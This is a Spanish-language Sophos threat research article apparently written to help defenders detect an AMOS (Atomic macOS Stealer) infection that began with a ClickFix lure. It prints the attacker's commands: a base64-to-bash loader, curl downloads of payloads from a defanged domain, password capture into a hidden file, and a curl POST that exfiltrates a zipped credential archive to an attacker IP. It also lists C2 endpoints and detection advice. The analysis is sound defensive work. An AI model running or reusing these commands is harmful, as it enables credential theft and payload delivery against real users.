Saltar a contenido
Empezar
Open search

Por qué es importante AMOS: el malware de macOS que roba datos a gran escala

Sophos X-Ops analiza el Atomic macOS Stealer y sus capacidades

Mohammed-Zubair-author-photo
Pratyush-Pritimay-author-photo
Vibhanshu-Tripathi-author-photo
Nandigama-Chaitanya-author-photo

Escrito por Mohammed Zubair, Pratyush Pritimay, Dr Vibhanshu Tripathi, Nandigama Chaitanya

amos-featured-image
Threat ResearchMacOSAMOSInfostealer

Los equipos de Detección y Respuesta Gestionadas (MDR) de Sophos respondieron recientemente a un incidente de un cliente relacionado con una infección por un infostealer en un host macOS. Al investigar, descubrimos que el infostealer parecía ser una variante de AMOS (Atomic macOS), una conocida familia de malware sobre la que ya hemos escrito antes.

El ataque comenzó con una artimaña al estilo ClickFix, en la que se engañó a un usuario para que ejecutara un comando de terminal. No es la primera vez que vemos esta técnica de ingeniería social utilizada junto con los infostealers de macOS; en marzo de este año informamos sobre múltiples variantes del stealer MacSync que adoptaban el mismo enfoque.

AMOS es una amenaza importante; representó casi el 40 % de nuestras actualizaciones de protección para macOS en 2025 (más del doble que cualquier otra familia de malware para macOS) y casi la mitad de los informes de clientes sobre ladrones de datos para macOS en los últimos tres meses, a fecha de este artículo. Como parte de una oferta de malware como servicio (MaaS), está optimizado para robar datos del Llavero, credenciales de navegador, cookies, información de autocompletar y otros datos de gran valor (como información de carteras de criptomonedas), lo que permite la rápida apropiación de cuentas y ataques posteriores. Se ha detectado en informes públicos desde al menos abril de 2023.

Más recientemente, en agosto de 2025, CrowdStrike informó de una campaña que involucraba una variante de AMOS denominada «SHAMOS». En diciembre de 2025, Huntress señaló incidentes relacionados con la distribución de AMOS a través de resultados de búsqueda infectados relacionados con conversaciones de ChatGPT/Grok, y en febrero de 2026 Microsoft mencionó AMOS dentro del contexto más amplio de los infostealers que se expanden a macOS y abusan de plataformas y utilidades de confianza para su distribución.

Como señalan muchos informes anteriores, y tal y como ocurrió en el caso que investigamos, las campañas de AMOS suelen basarse en la ingeniería social más que en cadenas de exploits. En algunos casos, los actores maliciosos utilizan instaladores falsos o señuelos de «aplicaciones crackeadas», aunque ClickFix parece ser un vector de infección cada vez más destacado. Más recientemente, y tal y como describimos en nuestro artículo sobre MacSync, los investigadores han informado del uso de señuelos relacionados con modelos de IA.

Sin embargo, esta ingeniería social no se limita a la infección inicial. Un comportamiento recurrente señalado por los defensores es la repetida solicitud de contraseña hasta que la víctima proporciona su contraseña de macOS, que luego se utiliza para realizar acciones con privilegios.

Resumen de la cadena de ataque

  1. La ingeniería social persuade al usuario para que ejecute un comando en Terminal
  2. Se descarga y ejecuta el script de arranque de la primera fase
  3. El malware captura y valida la contraseña de macOS del usuario
  4. Se recupera la carga útil de la segunda fase y se ejecuta con privilegios elevados
  5. Las rutinas anti-análisis detectan entornos virtualizados
  6. El malware recopila una gran cantidad de datos del usuario y del sistema (base de datos del llavero, contraseña de macOS, datos de perfiles de Firefox y Chrome, Apple Notes, almacenamiento de extensiones, datos de perfiles de host y del sistema, e información relacionada con criptomonedas)
  7. Los datos robados se archivan y se preparan para su exfiltración
  8. Los datos se envían a la infraestructura del atacante
  9. Se establece la persistencia mediante LaunchDaemon
  10. El sistema se registra en el servidor de comando y control (C2)

Inicialización

El comando proporcionado en el sitio controlado por el atacante —que el usuario fue engañado para ejecutar en Terminal— descarga y ejecuta un script de inicialización con el siguiente comando:

echo <b64> | base64 -d | bash 
curl -fsSL hxxps://sphereou[.]com/cleanera

Validación de la contraseña

El malware te pide la contraseña de tu sistema macOS y la valida localmente. Una vez validada, la contraseña se guarda en un archivo oculto para usarla más adelante.

username=$(whoami)
dscl . -authonly «$username» «$password»
echo -n «$password» > «/Users/$username/.pass»

Despliegue de la carga útil de segunda fase

Tras recopilar la contraseña, el malware descarga una carga útil secundaria desde hxxps[://]sphereou[.]com/cleaner3/update y la guarda en /tmp/update. Se eliminan los atributos extendidos para eludir las advertencias de seguridad de macOS, y se ejecuta el archivo.

curl -o /tmp/update hxxps://sphereou[.]com/cleaner3/update
echo «<PASSWORD>» | sudo -S xattr -c /tmp/update
chmod +x /tmp/update
/tmp/update

Anti-análisis

Para evadir la detección automatizada, el malware comprueba si se está ejecutando en una máquina virtual o en un entorno sandbox consultando los datos de system_profiler a través de osascript y buscando valores de hardware específicos.

Los indicadores que comprueba incluyen:

  • QEMU
  • VMware
  • KVM

Recopilación de credenciales y sesiones

El malware crea directorios en /tmp para almacenar los datos recopilados. También recupera un UUID de hardware para identificar de forma única el sistema de la víctima y realiza una enumeración básica del host:

whoami, id, hostname, ioreg IOPlatformUUID

Ejemplos de rutas de almacenamiento temporal:

/tmp/91897/

/tmp/91897/FileGrabber/NotesMedia/

En este caso que investigamos, el actor malicioso utilizó varios indicadores de configuración de AMOS (CONFIG_STEAL_FINDER, CONFIG_STEAL_NOTES_API y CONFIG_STEAL_HISTORY) para ejecutar las rutinas de recopilación.

AMOS procede a recopilar una amplia gama de datos confidenciales, entre los que se incluyen:

  • base de datos del llavero de macOS
  • datos del navegador Firefox (cookies, contraseñas guardadas, historial de formularios)
  • perfiles de Chrome/Chromium
  • archivos de almacenamiento de extensiones y de IndexedDB
  • tokens de sesión del navegador local

En la variante que analizamos, el conjunto de módulos de AMOS también incluía aplicaciones falsas de Ledger Wallet y Trezor Suite, lo que sugiere capacidades relacionadas con el robo de credenciales y semillas de criptomonedas.

Archivado y exfiltración

Los archivos recopilados se comprimen en un único archivo utilizando utilidades de macOS, antes de enviarse a un servidor controlado por el atacante.

ditto -c -k --sequesterRsrc /tmp/91897/ /tmp/out.zip
curl -X POST -F «file=@/tmp/out.zip» hxxp://38[.]244[.]158[.]56/contact

Persistencia

Para mantener el acceso a largo plazo, el atacante logra la persistencia a través de un LaunchDaemon. Se almacena un binario auxiliar oculto en el directorio de usuario y se configura para que se ejecute automáticamente.

Ejemplo de ruta de persistencia:

/Library/LaunchDaemons/com.finder.helper.plist

C2

El sistema infectado se registra en el servidor C2 y recupera instrucciones periódicamente. Ejemplos de endpoints C2:

hxxp://45[.]94[.]47[.]204/api/join/

hxxp://45[.]94[.] 47[.]204/api/tasks/

amos-attack-chain

Figura 1: la cadena de ataque de AMOS

Correspondencia con MITRE ATT&CK

Etapa del ataqueActividad: DescripciónTáctica MITRE ATT&CK  ID de la técnicaNombre de la técnica
Ejecución inicial El usuario ejecuta un comando malicioso en Terminal que inicia la cadena de infecciónEjecuciónT1059.004Intérprete de comandos y scripts: Shell de Unix
Etapa 1: CargadorSe ejecuta el script de arranque y descarga/ejecuta componentes adicionalesEjecuciónT1059Intérprete de comandos y scripts
Solicitud de credencialesUna solicitud falsa captura la contraseña del sistema del usuarioAcceso a credencialesT1056Captura de entradas
Etapa 2: Carga útilSe ejecuta la carga útil secundaria para implementar la funcionalidad de robo de datosEjecuciónT1059 / T1106Ejecución de comandos / API nativa
Comprobaciones del entornoEl malware realiza comprobaciones para recopilar información del sistema y validar el entorno de ejecuciónDetecciónT1082Detección de información del sistema
Recopilación de credencialesSe extraen credenciales confidenciales de los navegadores y del llavero de macOSAcceso a credencialesT1555Credenciales de almacenes de contraseñas
Preparación de datosLos datos robados se comprimen o archivan antes enviarlosRecopilaciónT1560Archivo de datos recopilados
Exfiltración de datosLos datos recopilados se transmiten a la infraestructura controlada por el atacanteExfiltraciónT1041Exfiltración a través del canal C2
Mecanismo de persistenciaEl malware instala mecanismos de persistencia (p. ej., agentes de inicio) para sobrevivir a los reiniciosPersistenciaT1543.001Crear o modificar proceso del sistema: agente de inicio

 

Mantener la seguridad

Oportunidades de detección

  • Intentos de autenticación con dscl seguidos de almacenamiento oculto de contraseñas
  • Creación de directorios temporales en /tmp
  • Compresión de grandes conjuntos de datos de credenciales usando ditto
  • Solicitudes POST salientes con curl que envían archivos comprimidos a direcciones IP externas
  • Creación de LaunchDaemons con propiedad de root
  • Acceso a los almacenes de credenciales del navegador y a rutas de datos relevantes para Notes/Keychain desde procesos no estándar
  • Los artefactos basados en el host pueden incluir:
    • /Users/<nombre de usuario>/.pass
    • /tmp/update
    • /tmp/91897/
    • /tmp/out.zip
    • /Users/<nombre de usuario>/.agent
    • /Users/<nombre de usuario>/.mainhelper - /Library/LaunchDaemons/com.finder.helper.plist

Oportunidades de prevención

  • Bloquea y avisa ante patrones de ejecución iniciados por el usuario mediante pegar y ejecutar en Terminal (estilo ClickFix).
  • Aplica los requisitos de Gatekeeper y la certificación; desactiva la configuración de ejecución «En cualquier lugar».
  • Mantén XProtect y las actualizaciones de seguridad del sistema activadas y totalmente al día.
  • Elimina los derechos de administrador local por defecto; eleva privilegios solo cuando sea necesario.
  • Bloquea la ejecución de binarios sin firmar o no fiables desde rutas ocultas del directorio de inicio del usuario (ejecutables con prefijo de punto).
  • Supervisa y avisa de LaunchDaemons nuevos o modificados en /Library/LaunchDaemons/ (p. ej., com.finder.helper.plist)
  • Restringe la instalación de aplicaciones de monederos o criptomonedas no aprobadas

Protecciones de Sophos

  • OSX-CRD-PRC-STEAL-BROWSER-DATA-1
  • OSX-COL-PRC-SUSP-DITTO-1
  • OSX/Infostl-FH
  • OSX/InfoStl-GA

Conclusión

El malware convencional afecta ahora con regularidad a los usuarios de macOS, especialmente en lo que respecta a los ladrones de información, que suelen representar una parte significativa de todas las detecciones de macOS que vemos en la telemetría.

AMOS, en particular, sigue siendo una preocupación importante. Al igual que muchos de su clase, su uso de la ingeniería social para eludir los controles de seguridad lo convierte en una amenaza potente. Como señalamos en nuestro artículo sobre MacSync, los señuelos específicos que usan los autores de amenazas siguen adaptándose en respuesta a las tendencias sociales y del sector tecnológico.

Seguiremos vigilando e investigando las infecciones por ladrones de información en macOS, actualizaremos la información sobre protección y detección según sea necesario, y publicaremos investigaciones sobre esta área del panorama de amenazas en rápida evolución a medida que dispongamos de datos.

Los IOC relacionados con este artículo estarán disponibles en nuestro repositorio de GitHub.

Agradecimientos

Sophos X-Ops quiere dar las gracias a Jagadeesh Chandraiah, de SophosLabs, por su contribución a este informe.

 

 

Acerca del autor

Mohammed-Zubair-author-photo

Mohammed Zubair

Mohammed Zubair is an MDR Threat Analyst 3 at Sophos, working remotely from Hyderabad. He leads incident investigations, performs threat hunting, and managing operations as a shift lead. Zubair holds a Master’s degree in Information Security and Digital Forensics from the UK. In his free time, he enjoys exploring new restaurants, trying different cuisines, and traveling to different parts of the world.

Pratyush-Pritimay-author-photo

Pratyush Pritimay

Pratyush Pritimay is a cybersecurity professional working as a Threat Analyst 2 at Sophos. His work spans threat hunting, incident response, and digital forensics, with growing interests in malware analysis and detection engineering. He enjoys investigating security alerts, studying attacker behavior, and helping strengthen defenses through practical, evidence-driven analysis.

Outside of work, Pratyush is a literature enthusiast, community builder, and gamer. He enjoys reading and writing creative fiction, mentoring cybersecurity learners, supporting cyber awareness along with community initiatives, and unwinding with FPS games.

Vibhanshu-Tripathi-author-photo

Dr Vibhanshu Tripathi

Vibhanshu Tripathi is a team lead at Sophos, working remotely from Uttar Pradesh (UP) India. He leads a MDR team, managing day to day threat operations. Enjoys working in malware analysis and detection engineering. Vibhanshu holds 9+ years of IT experience. In his free time, he enjoys exploring new places, thoughts, perspectives and technologies
Nandigama-Chaitanya-author-photo

Nandigama Chaitanya

Vishnu Chaitanya is a Team Lead at Sophos with close to nine years of experience in cybersecurity. Based in Hyderabad, Telangana, he manages a remote team and has a keen interest in threat investigation and malware analysis. Outside of work, he enjoys playing cricket.